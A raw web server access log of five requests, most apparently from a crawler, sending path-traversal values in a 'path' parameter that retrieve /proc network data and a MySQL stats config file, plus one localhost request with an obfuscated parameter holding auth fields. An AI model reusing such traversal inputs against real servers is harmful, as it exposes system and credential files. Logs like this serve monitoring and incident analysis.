216.73.216.215 - - [13/Jan/2026:11:20:54 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Fproc%2F6565%2Fnet%2Fif_inet6 HTTP/1.0" 200 1376 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:20:57 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Fproc%2F6565%2Fnet%2Fif_inet6 HTTP/1.0" 200 1375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:11:21:00 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fvim%2F..%2Fzabbix%2F.%2Fpercona%2Fscripts%2F.%2Fss_get_mysql_stats.php.cnf HTTP/1.0" 200 1463 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:11:15:42 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383239353734322p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383239323134322q3461353935663339373165346334363937303131623936613732386132383632222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:11:21:03 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2Fntpdate%2F..%2Fghostscript%2FCMap%2FKSCms-UHC-V HTTP/1.0" 200 2729 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
